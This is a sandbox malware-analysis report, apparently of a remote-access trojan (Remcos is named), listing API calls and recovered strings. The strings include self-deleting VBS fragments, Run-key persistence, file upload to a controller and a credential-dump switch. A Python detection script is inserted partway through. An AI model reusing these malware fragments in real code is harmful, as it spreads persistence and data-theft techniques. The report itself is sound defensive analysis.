                        • API String ID: 2649220323-71629269
                        • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                        • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                        • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                        • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                        APIs
                        • _wcslen.LIBCMT ref: 0040B882
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                        • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                        • _wcslen.LIBCMT ref: 0040B968
                        • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                        • _wcslen.LIBCMT ref: 0040BA25
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                        • ExitProcess.KERNEL32 ref: 0040BC36
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                        • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                        • API String ID: 2743683619-2376316431
                        • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                        • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                        • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                        • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                        APIs
                          • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                          • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                          • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                          • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                        • ExitProcess.KERNEL32 ref: 0040BFD7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                        • API String ID: 3797177996-2974882535
                        • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                        • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                        • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                        • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                        APIs
                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                        • SetEvent.KERNEL32 ref: 004191CF
                        • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                        • CloseHandle.KERNEL32 ref: 004191F0
                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                        • API String ID: 738084811-1354618412
                        • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                        • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                        • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                        • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                        • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                        • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                        • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Create
                        • String ID: RIFF$WAVE$data$fmt
                        • API String ID: 1602526932-4212202414
                        • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                        • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                        • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                        • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                        • LoadLibraryA.KERNEL32(?), ref: 0041386D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                        • FreeLibrary.KERNEL32(00000000), ref: 00413894
                        • LoadLibraryA.KERNEL32(?), ref: 004138CC
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                        • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                        • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                        • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                        • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                        • API String ID: 2490988753-3443138237
                        • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                        • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                        • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                        • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$EnvironmentVariable$_wcschr
                        • String ID:
                        • API String ID: 3899193279-0
                        • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                        • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                        • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                        • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                        • _free.LIBCMT ref: 0044E4DF
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 0044E501
                        • _free.LIBCMT ref: 0044E516
                        • _free.LIBCMT ref: 0044E521
                        • _free.LIBCMT ref: 0044E543
                        • _free.LIBCMT ref: 0044E556
                        • _free.LIBCMT ref: 0044E564
                        • _free.LIBCMT ref: 0044E56F
                        • _free.LIBCMT ref: 0044E5A7
                        • _free.LIBCMT ref: 0044E5AE
                        • _free.LIBCMT ref: 0044E5CB
                        • _free.LIBCMT ref: 0044E5E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID: pF
                        • API String ID: 161543041-2973420481
                        • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                        • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                        • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                        • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                          • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                        • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                        • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                        • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                        • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                        • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                        • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                        • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                        • Sleep.KERNEL32(00000064), ref: 00411C63
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                        • String ID: /stext "$$.F$@#G$@#G
                        • API String ID: 1223786279-2596709126
                        • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                        • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                        • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                        • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: pF
                        • API String ID: 269201875-2973420481
                        • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                        • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                        • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                        • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                          • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                        • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                        • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                        • API String ID: 193334293-3226144251
                        • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                        • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                        • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                        • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
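Two of the records above describe process-level activity a defender can look for directly. The record whose strings include `/stext "` surrounds that argument with repeated Sleep and DeleteFileW calls followed by a send; `/stext "<file>"` is the switch the NirSoft recovery tools accept to write their output to a text file. The record ending here walks the process list with CreateToolhelp32Snapshot, Process32FirstW and Process32NextW while holding the names ieinstal.exe and ielowutil.exe and the Internet Explorer directory, then creates a mutex. The Python below is an added example written for this report, not Joe Sandbox or Remcos code: it triages process-creation events for both patterns. The event records are constructed, and the rule that the two IE helpers are normally parented by iexplore.exe is a heuristic assumption of the example, not a finding of the report.

```python
"""Triage of Windows process-creation events for two behaviours shown in the
records above.  Added example for this report; it is not Joe Sandbox or Remcos
code, and the event records below are constructed, not taken from the sandbox."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# "/stext" followed by a quoted path is the NirSoft password-recovery switch
# that writes results to a text file; the string `/stext "` is in the dump.
STEXT_RE = re.compile(r'(?:^|\s)/stext\s+"', re.IGNORECASE)

# Internet Explorer helper executables named in the process-enumeration record.
IE_HELPERS = {"ieinstal.exe", "ielowutil.exe"}

# Heuristic assumption (not stated in the report): these helpers are normally
# started by iexplore.exe, so any other parent is worth a look.
EXPECTED_PARENT = "iexplore.exe"


@dataclass
class ProcEvent:
    image: str          # full path of the started executable
    command_line: str   # its command line
    parent_image: str   # full path of the parent executable


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: Iterable[ProcEvent]) -> List[str]:
    """Return one finding string per suspicious event, in input order."""
    findings: List[str] = []
    for ev in events:
        img = basename(ev.image)
        parent = basename(ev.parent_image)
        if STEXT_RE.search(ev.command_line):
            findings.append(f"nirsoft_stext:{img}")
        if img in IE_HELPERS and parent != EXPECTED_PARENT:
            findings.append(f"ie_helper_unexpected_parent:{img}<-{parent}")
    return findings


# Constructed sample events (paths and names are made up for the example).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\tool.exe",
              r'"C:\Users\u\AppData\Local\Temp\tool.exe" /stext "C:\Users\u\AppData\Local\Temp\out.txt"',
              r"C:\Users\u\AppData\Local\Temp\sample.exe"),
    ProcEvent(r"C:\Program Files (x86)\Internet Explorer\ieinstal.exe",
              r'"C:\Program Files (x86)\Internet Explorer\ieinstal.exe"',
              r"C:\Users\u\AppData\Local\Temp\sample.exe"),
    ProcEvent(r"C:\Program Files (x86)\Internet Explorer\ielowutil.exe",
              r'"C:\Program Files (x86)\Internet Explorer\ielowutil.exe"',
              r"C:\Program Files (x86)\Internet Explorer\iexplore.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Feed the function from whatever produces process-creation records in your environment (Sysmon Event ID 1, EDR telemetry); the `/stext` match on its own is a strong signal, while the parent check on the IE helpers is only a starting point for a hunt.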
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                        • RegCloseKey.ADVAPI32(?), ref: 0041A749
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumOpen
                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                        • API String ID: 1332880857-3714951968
                        • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                        • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                        • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                        • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                        APIs
                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                        • GetCursorPos.USER32(?), ref: 0041B39E
                        • SetForegroundWindow.USER32(?), ref: 0041B3A7
                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                        • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                        • ExitProcess.KERNEL32 ref: 0041B41A
                        • CreatePopupMenu.USER32 ref: 0041B420
                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                        • String ID: Close
                        • API String ID: 1657328048-3535843008
                        • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                        • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                        • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                        • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$Info
                        • String ID:
                        • API String ID: 2509303402-0
                        • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                        • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                        • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                        • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                        • __aulldiv.LIBCMT ref: 00407D89
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                        • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                        • CloseHandle.KERNEL32(00000000), ref: 00408038
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                        • API String ID: 3086580692-2596673759
                        • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                        • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                        • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                        • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                        APIs
                          • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                          • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                          • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                          • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                          • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                        • ExitProcess.KERNEL32 ref: 0040C57D
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                        • API String ID: 1913171305-2600661426
                        • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                        • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                        • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                        • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
